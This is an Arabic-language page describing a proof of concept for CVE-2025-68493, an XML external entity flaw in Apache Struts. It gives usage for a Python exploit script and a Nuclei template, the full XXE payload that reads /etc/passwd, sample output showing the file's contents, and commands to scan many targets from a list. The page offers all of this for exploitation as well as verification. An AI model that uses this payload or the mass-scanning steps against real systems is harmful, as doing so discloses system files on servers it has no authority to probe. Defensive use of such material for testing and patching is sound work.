
CVE-2025-68493
CVE-2025-68493
[1] ثغرة ApacheStrutsXWorkXML وCVE-2025-68493 PoC والنصوص البرمجية | ZONE.CI الشبكة العالمية. https://zone.ci/secarticles/wx/486533.html
للتحقق من ثغرة CVE-2025-68493 واستغلالها، يمكن استخدام سكربت Python PoC وقالب Nuclei YAML الموفرين أدناه.
اسم السكربت: cve_2025_68493_poc.py
الوظيفة: يُستخدم هذا السكربت للتحقق من الثغرة على هدف واحد، ومحاولة قراءة ملف محدد (افتراضيًا /etc/passwd).
المتطلبات الأساسية:
requests (pip install requests)وسائط سطر الأوامر:
-u, --url: عنوان URL الأساسي للتطبيق المستهدف (مثال: http://127.0.0.1:8080)-f, --file: مسار الملف المستهدف لمحاولة قراءته (افتراضيًا /etc/passwd)مثال:
python3 cve_2025_68493_poc.py -u http://example.com:8080 -f /etc/passwd
المخرجات المتوقعة:
إذا كان الهدف يحتوي على الثغرة وتمت قراءة الملف بنجاح، فسيتم عرض محتوى مشابه لما يلي:
[*] Testing URL: http://example.com:8080/struts2-xml-parser/xmlParserNoDtdParse
[*] Payload: <?xml version="1.0"?><!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd">]> <foo>&xxe;</foo>
[+] Vulnerable! Successfully read /etc/passwd
----------------------------------------
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
----------------------------------------
اسم القالب: cve-2025-68493.yaml
الوظيفة: يُستخدم هذا القالب مع أداة Nuclei لإجراء فحص جماعي لعدة أهداف للكشف عن ثغرة CVE-2025-68493.
المتطلبات الأساسية:
وسائط سطر الأوامر:
-t: تحديد مسار ملف قالب Nuclei-u: تحديد عنوان URL لهدف واحد-l: تحديد ملف يحتوي على عدة عناوين URL لأهداف متعددةمثال:
فحص هدف واحد:
nuclei -t cve-2025-68493.yaml -u http://example.com:8080
فحص جماعي:
افترض أن لديك ملفًا باسم targets.txt، حيث يحتوي كل سطر على عنوان URL لهدف:
http://target1.com:8080
http://target2.com:8080
نفّذ الأمر التالي لإجراء الفحص الجماعي:
nuclei -t cve-2025-68493.yaml -l targets.txt